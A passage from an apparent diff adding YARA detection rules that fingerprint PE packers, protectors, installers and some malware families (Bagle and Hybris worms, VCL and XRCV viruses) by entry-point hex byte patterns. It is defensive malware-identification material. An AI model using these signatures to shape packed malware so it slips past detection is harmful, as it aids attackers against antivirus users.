+		$a0 = { 68 00 1A 40 00 E8 EE FF FF FF 00 00 00 00 00 00 30 00 00 00 40 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 ?? ?? ?? ?? ?? ?? 50 72 6F 6A 65 63 74 31 00 ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 06 00 00 00 AC 29 40 00 07 00 00 00 BC 28 40 00 07 00 00 00 74 28 40 00 07 00 00 00 2C 28 40 00 07 00 00 00 08 23 40 00 01 00 00 00 38 21 40 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 00 00 8C 21 40 00 08 ?? 40 00 01 00 00 00 AC 19 40 00 00 00 00 00 00 00 00 00 00 00 00 00 AC 19 40 00 4F 00 43 00 50 00 00 00 E7 AF 58 2F 9A 4C 17 4D B7 A9 CA 3E 57 6F F7 76 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv140v145
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB C3 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo300aSiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv20b4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 10 53 55 56 57 C7 44 24 14 F0 91 40 00 33 ED C6 44 24 13 20 FF 15 2C 70 40 00 55 FF 15 88 72 40 00 BE 00 D4 42 00 BF 00 04 00 00 56 57 A3 60 6F 42 00 FF 15 C4 70 40 00 E8 9F FF FF FF 8B 1D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 60 71 40 00 }
+	$a1 = { 83 EC 14 83 64 24 04 00 53 55 56 57 C6 44 24 13 20 FF 15 30 70 40 00 BE 00 20 7A 00 BD 00 04 00 00 56 55 FF 15 C4 70 40 00 56 E8 7D 2B 00 00 8B 1D 8C 70 40 00 6A 00 56 FF D3 BF 80 92 79 00 56 57 E8 15 26 00 00 85 C0 75 38 68 F8 91 40 00 55 56 FF 15 60 71 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule PESHiELDv01bMTE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B9 1B 01 ?? ?? D1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerV100BeRo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? ?? ?? 8D B2 ?? ?? ?? ?? 8B 46 ?? 85 C0 74 51 03 C2 8B 7E ?? 8B 1E 85 DB 75 02 8B DF 03 DA 03 FA 52 57 50 FF 15 ?? ?? ?? ?? 5F 5A 85 C0 74 2F 8B C8 8B 03 85 C0 74 22 0F BA F0 1F 72 04 8D 44 ?? ?? 51 52 57 50 51 FF 15 ?? ?? ?? ?? 5F 5A 59 85 C0 74 0B AB 83 C3 04 EB D8 83 C6 14 EB AA 61 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRHv32aemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SpecialEXEPaswordProtectorv101EngPavolCerven
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 00 00 8D 95 C6 77 00 00 8D 8D FF 77 00 00 55 68 00 20 00 00 51 52 6A 00 FF 95 04 7A 00 00 5D 6A 00 FF 95 FC 79 00 00 8D 8D 60 78 00 00 8D 95 85 01 00 00 55 68 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv166
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 ?? 87 DD 8B 85 E6 90 40 ?? 01 85 33 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 DA 90 40 ?? 01 85 DE 90 40 ?? 01 85 E2 90 40 ?? BB 5B 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv167
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 8B 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VIRUSIWormHybris
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 16 A8 54 ?? ?? 47 41 42 4C 4B 43 47 43 ?? ?? ?? ?? ?? ?? 52 49 53 ?? FC 68 4C 70 40 ?? FF 15 }
+
+condition:
+		$a0
+}
+	
+	
+rule GPInstallv50332
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 57 B8 C4 1C 41 00 E8 6B 3E FF FF 33 C0 55 68 76 20 41 00 64 FF 30 64 89 20 BA A0 47 41 00 33 C0 E8 31 0A FF FF 33 D2 A1 A0 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02PEIntro10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 9C 60 E8 14 00 00 00 5D 81 ED 0A 45 40 90 80 BD 67 44 40 90 90 0F 85 48 FF ED 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov410SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 F8 8E 4C 00 68 D0 EA 49 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4C 00 33 D2 8A D4 89 15 7C A5 4C 00 8B C8 81 E1 FF 00 00 00 89 0D 78 A5 4C 00 C1 E1 08 03 CA 89 0D 74 A5 4C 00 C1 E8 10 A3 70 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AverCryptor102betaos1r1s
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 0C 17 40 00 8B BD 33 18 40 00 8B 8D 3B 18 40 00 B8 51 18 40 00 03 C5 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 37 18 40 00 33 C0 51 33 C9 66 B9 F7 00 66 83 F9 00 74 49 8B 57 0C 03 95 37 18 40 00 8B 85 3F 18 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 8B F1 E8 27 00 00 00 8B C8 5F B8 51 18 40 00 03 C5 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 2F 18 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 23 F7 8B C6 5F 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv131
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv133
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HidePE101BGCorp
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 F8 FF E2 0D 0A 2D 3D 5B 20 48 69 64 65 50 45 20 62 79 20 42 47 43 6F 72 70 20 5D 3D 2D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED FB 1D 40 00 B9 7B 09 00 00 8B F7 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Thinstallvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 EF BE AD DE 50 6A ?? FF 15 10 19 40 ?? E9 AD FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1200ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 3F 1E 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivatePersonalPackerPPP103ConquestOfTroycom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 19 00 00 00 90 90 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00 E8 D3 03 00 00 A3 20 37 00 10 50 6A 00 E8 DE 03 00 00 A3 24 37 00 10 FF 35 20 37 00 10 6A 00 E8 EA 03 00 00 A3 30 37 00 10 FF 35 24 37 00 10 E8 C2 03 00 00 A3 28 37 00 10 8B 0D 30 37 00 10 8B 3D 28 37 00 10 EB 09 49 C0 04 39 55 80 34 39 24 0B C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VIRUSIWormBagle
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 E8 95 01 00 00 E8 9F E6 FF FF 83 3D 03 50 40 00 00 75 14 68 C8 AF 00 00 E8 01 E1 FF FF 05 88 13 00 00 A3 03 50 40 00 68 5C 57 40 00 68 F6 30 40 00 FF 35 03 50 40 00 E8 B0 EA FF FF E8 3A FC FF FF 83 3D 54 57 40 00 00 74 05 E8 F3 FA FF FF 68 E8 03 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule RLPackv118BasicLZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule StonesPEEncryptorv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 42 30 40 ?? FF 95 32 35 40 ?? B8 37 30 40 ?? 03 C5 2B 85 1B 34 40 ?? 89 85 27 34 40 ?? 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv029betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 29 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02BJFNT11bAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 EA 9C EB 01 EA 53 EB 01 EA 51 EB 01 EA 52 EB 01 EA 56 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXScramblerRCv1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECrypt15BitShapeSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 55 20 40 00 B9 7B 09 00 00 8D BD 9D 20 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv021BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 8B F8 ?? ?? ?? ?? 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXFreakV01HMX0101
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler20p0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 0A 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 1C 2F 40 00 E8 C8 F1 FF FF 33 C0 55 68 FB 33 40 00 64 FF 30 64 89 20 BA 0C 34 40 00 B8 E4 54 40 00 E8 EF FE FF FF 8B D8 85 DB 75 07 6A 00 E8 5A F2 FF FF BA E8 54 40 00 8B C3 8B 0D E4 54 40 00 E8 74 E2 FF FF C7 05 20 6B 40 00 09 00 00 00 BB 98 69 40 00 C7 45 EC E8 54 40 00 C7 45 E8 31 57 40 00 C7 45 E4 43 60 40 00 BE D3 6A 40 00 BF E0 6A 40 00 83 7B 04 00 75 0B 83 3B 00 0F 86 AA 03 00 00 EB 06 0F 8E A2 03 00 00 8B 03 8B D0 B8 0C 6B 40 00 E8 C1 EE FF FF B8 0C 6B 40 00 E8 6F EE FF FF 8B D0 8B 45 EC 8B 0B E8 0B E2 FF FF 6A 00 6A 1E 6A 00 6A 2C A1 0C 6B 40 00 E8 25 ED FF FF 8D 55 E0 E8 15 FE FF FF 8B 55 E0 B9 10 6B 40 00 A1 0C 6B 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule HACKSTOPv100
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA BD ?? ?? FF E5 6A 49 48 0C ?? E4 ?? 3F 98 3F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeShield36wwwexeshieldcom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 CE 1E 42 AF F8 D6 CC E9 FB C8 4F 1B 22 7C B4 C8 0D BD 71 A9 C8 1F 5F B1 29 8F 11 73 8F 00 D1 88 87 A9 3F 4D 00 6C 3C BF C0 80 F7 AD 35 23 EB 84 82 6F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pe123v200644
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C0 EB 01 34 60 EB 01 2A 9C EB 02 EA C8 E8 0F 00 00 00 EB 03 3D 23 23 EB 01 4A EB 01 5B C3 8D 40 00 53 EB 01 6C EB 01 7E EB 01 8F E8 15 01 00 00 50 E8 67 04 00 00 EB 01 9A 8B D8 FF D3 5B C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B C0 55 8B EC 60 8B 4D 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtectorV11xRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 88 88 88 08 64 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BobPackv100BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DBPEv210
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71 01 E8 79 E0 7A 01 75 83 C4 04 9D EB 01 75 68 5F 20 40 ?? E8 B0 EF FF FF 72 03 73 01 75 BE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackv31NorthStar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }
+	$a1 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule SVKProtectorV13XPavolCerven
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakePECrypt102FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02WATCOMCCEXEAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 90 90 90 90 57 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PENinja
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UpackV036Dwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 18 10 00 00 10 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 02 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 14 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 FF 76 08 FF 76 0C BE 1C 01 }
+	$a1 = { BE ?? ?? ?? ?? FF 36 E9 C3 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule yodasProtectorv101AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 E8 03 00 00 00 EB 01 ?? E8 86 00 00 00 E8 03 00 00 00 EB 01 ?? E8 79 00 00 00 E8 03 00 00 00 EB 01 ?? E8 A4 00 00 00 E8 03 00 00 00 EB 01 ?? E8 97 00 00 00 E8 03 00 00 00 EB 01 ?? E8 2D 00 00 00 E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPX050070
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 83 E8 3D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxVCLencrypted
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 01 B9 ?? ?? 81 34 ?? ?? 46 46 E2 F8 C3 }
+	$a1 = { 01 B9 ?? ?? 81 35 ?? ?? 47 47 E2 F8 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VxXRCV1015
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 83 ?? ?? 53 51 1E 06 B4 99 CD 21 80 FC 21 ?? ?? ?? ?? ?? 33 C0 50 8C D8 48 8E C0 1F A1 ?? ?? 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackv118BasicDLLaPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC290300400DLLX86CRTLIB
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 8B 5D 0C 8B 75 10 BF 01 00 00 00 85 DB 75 10 83 3D ?? ?? ?? ?? 00 75 07 31 C0 E9 ?? ?? ?? ?? 83 FB 01 74 05 83 FB 02 75 ?? 85 FF 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler13Bp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 08 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 98 56 00 10 E8 48 EB FF FF 33 C0 55 68 AC 5D 00 10 64 FF 30 64 89 20 6A 00 68 BC 5D 00 10 68 C4 5D 00 10 6A 00 E8 23 EC FF FF E8 C6 CE FF FF 6A 00 68 BC 5D 00 10 68 ?? ?? ?? ?? 6A 00 E8 0B EC FF FF E8 F2 F4 FF FF B8 08 BC 00 10 33 C9 BA 04 01 00 00 E8 C1 D2 FF FF 6A 00 68 BC 5D 00 10 68 E4 5D 00 10 6A 00 E8 E2 EB FF FF 68 04 01 00 00 68 08 BC 00 10 6A 00 FF 15 68 77 00 10 6A 00 68 BC 5D 00 10 68 FC 5D 00 10 6A 00 E8 BD EB FF FF BA 10 5E 00 10 B8 70 77 00 10 E8 CA F3 FF FF 85 C0 0F 84 F7 05 00 00 BA 74 77 00 10 8B 0D 70 77 00 10 E8 FE CD FF FF 6A 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HyingsPEArmor075exeHyingCCG
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? 00 00 00 00 00 00 ?? ?? 01 00 00 00 00 00 00 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 74 ?? ?? ?? 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule SimbiOZPolyCryptorvxxExtranger
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AVPACKv120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 1E 0E 1F 16 07 33 F6 8B FE B9 ?? ?? FC F3 A5 06 BB ?? ?? 53 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov220
